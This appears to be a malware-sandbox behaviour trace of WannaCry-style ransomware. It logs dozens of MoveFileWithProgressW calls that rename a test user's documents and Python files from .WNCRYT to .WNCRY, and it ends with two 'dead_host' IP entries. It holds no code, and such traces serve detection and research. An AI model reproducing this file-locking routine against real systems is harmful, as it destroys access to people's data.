 newfilepath_r: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\ATwjKHHgPIXqpQbCw.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRYT
newfilepath: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRY
oldfilepath: C:\Users\test22\Documents\axTZwDBeUngqBG.ppt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\CJgZNzWBCXYHnBkZq.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\cNwCMkjaYf.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\cXMLMLMlMJidCP.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\eMPyMLlGiYRCx.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRYT
newfilepath: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRY
oldfilepath: C:\Users\test22\Documents\FSRTltbNCjG.docx.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\gxeffFGQwhrjD.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\JDHeJjBWHuxqp.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\jrRNInQJEzypfU.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\jsGIrPlHsPM.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\KIprYLexEf.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\mITOpbdqvUil.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\NMsibqicnH.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRYT
newfilepath: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRY
oldfilepath: C:\Users\test22\Documents\ONyeiyAHXnG.docx.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\QAXyTXeWuxZprZY.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\qiBMgZOnGFjI.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRYT
newfilepath: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRY
oldfilepath: C:\Users\test22\Documents\tLwQFCBpzg.ppt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\vSjjFAKhemtn.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRYT
newfilepath: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRY
oldfilepath: C:\Users\test22\Documents\VyTyVAoqvtpE.docx.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\WmXfDlmbAt.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\XdyTjZxlaDDcWzshC.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\xTgoutelmxZUthF.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRYT
newfilepath: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRY
oldfilepath: C:\Users\test22\Documents\ZyMQVIOJRV.rtf.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\eFXSzzbotjWlnikZ.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\FAaWoqRZplEQFsGvV.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\FOwRatdvSt.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\gQkWZLHqeA.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\iZaIwdonvHsGmWxjG.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\sByekmDWYN.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\tfWgfaUyXRlwSTg.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRYT
newfilepath: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRY
oldfilepath: C:\Users\test22\Documents\UvxreHDTdz.docm.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.bmp.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.bmp.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.bmp.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.bmp.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.c.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.c.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.c.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.c.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.cpp.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.cpp.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.cpp.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.cpp.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.doc.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.doc.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.doc.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.doc.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.hwp.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.hwp.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.hwp.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.hwp.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.txt.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.txt.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.txt.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Users\test22\Documents\readme.xls.WNCRY
flags: 2
oldfilepath_r: C:\Users\test22\Documents\readme.xls.WNCRYT
newfilepath: C:\Users\test22\Documents\readme.xls.WNCRY
oldfilepath: C:\Users\test22\Documents\readme.xls.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\log.txt.WNCRY
flags: 2
oldfilepath_r: C:\log.txt.WNCRYT
newfilepath: C:\log.txt.WNCRY
oldfilepath: C:\log.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\LICENSE.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\LICENSE.txt.WNCRYT
newfilepath: C:\Python27\LICENSE.txt.WNCRY
oldfilepath: C:\Python27\LICENSE.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\NEWS.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\NEWS.txt.WNCRYT
newfilepath: C:\Python27\NEWS.txt.WNCRY
oldfilepath: C:\Python27\NEWS.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\README.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\README.txt.WNCRYT
newfilepath: C:\Python27\README.txt.WNCRY
oldfilepath: C:\Python27\README.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\Lib\email\test\data\msg_02.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_02.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_02.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_02.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\Lib\email\test\data\msg_06.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_06.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_06.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_06.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\Lib\email\test\data\msg_07.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_07.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_07.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_07.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\Lib\email\test\data\msg_13.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_13.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_13.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_13.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\Lib\email\test\data\msg_15.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_15.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_15.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_15.txt.WNCRYT
1 1 0

MoveFileWithProgressW

 newfilepath_r: C:\Python27\Lib\email\test\data\msg_16.txt.WNCRY
flags: 2
oldfilepath_r: C:\Python27\Lib\email\test\data\msg_16.txt.WNCRYT
newfilepath: C:\Python27\Lib\email\test\data\msg_16.txt.WNCRY
oldfilepath: C:\Python27\Lib\email\test\data\msg_16.txt.WNCRYT
1 1 0
dead_host 163.172.13.165:9001
dead_host 81.7.10.93:31337